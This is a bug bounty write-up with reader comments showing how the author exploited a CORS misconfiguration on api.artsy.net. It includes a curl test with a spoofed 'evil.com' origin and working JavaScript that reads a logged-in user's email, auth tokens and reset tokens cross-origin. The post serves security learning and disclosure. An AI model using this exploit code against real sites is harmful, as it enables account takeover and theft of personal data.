Exploiting Insecure Cross Origin Resource Sharing ( CORS ) | api.artsy.net
Exploiting Insecure Cross Origin Resource Sharing – BugBountyPOC
This post is published by Muhammad Khizer Javed as a contributor on BugBountyPOC .Note that the post is written by Muhammad Khizer Javed, & any mistake in writing will be entertained only from him We allow anyone to write contents on our blog as a guest/contributor so other can also learn.If you’re interested in sharing your finding through Bug Bounty POC Platform just signup on blog and you can post freely.
Hello BugBountyPoc viewers, this is Khizer few days a go i was testing different sites for CORS (Cross Origin Resource Sharing ) issues so that i can see what actually it is as i took about a week to understand it from different sources and blogs so i found a website that was vulnerable and I tried to see what i can do with the CORS issue on it,
To test the website for CORS issue i first use CURL,
i.e: curl https://api.artsy.net -H “Origin: https://evil.com” -I
As you can see the response of Curl request include,
Access-Control-Allow-Credentials: true
and
Access-Control-Allow-Origin: https://evil.com
Means that the website is vulnerable to CORS attack, then i followed up with GeekBoy Blog Post as he clearly share the exploit about the CORS issue, I found an API endpoint where i can see the details of user that is logged in,
https://api.artsy.net/api/user_details/
Well i use the exploit code Shared by geekboy to check what if i can export user info on that page that includes,
id,date created,email,birthday,phone,authentication_token,reset_password_token,collections,devices etc
Exploit code:
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById(“demo”).innerHTML =
alert(this.responseText);
}
};
xhttp.open(“GET”, “https://api.artsy.net/api/user_details/<User-ID>”, true);
xhttp.withCredentials = true;
xhttp.send();
}
I uploaded the exploit with my poc on my website
And now if a logged in user use the exploit on my website his account information will be exported to my website
Video
At the End I would like to Thanks Geekboy & ALL the other blog posts that helped me to understand and exploit this issue successfully
Thanks,
Bounty?
Well They didn’t give anything as They said its valid and then they said Its a Duplicate for Internal finding So i thought I should share it with u guys
Many companies saying its duplicate or not valid donno whether they are fixing silently or not serious about the security
Very nice bro keep it up
Thanks bro 🙂
Hi Muhammad,
I was checked this exploit on my target, but it’s doesn’t work with Authorization header bearer.
So do you know how we bypass this ? (withCredential was set true)
How to remediate this issue
Amazing PoC Bro…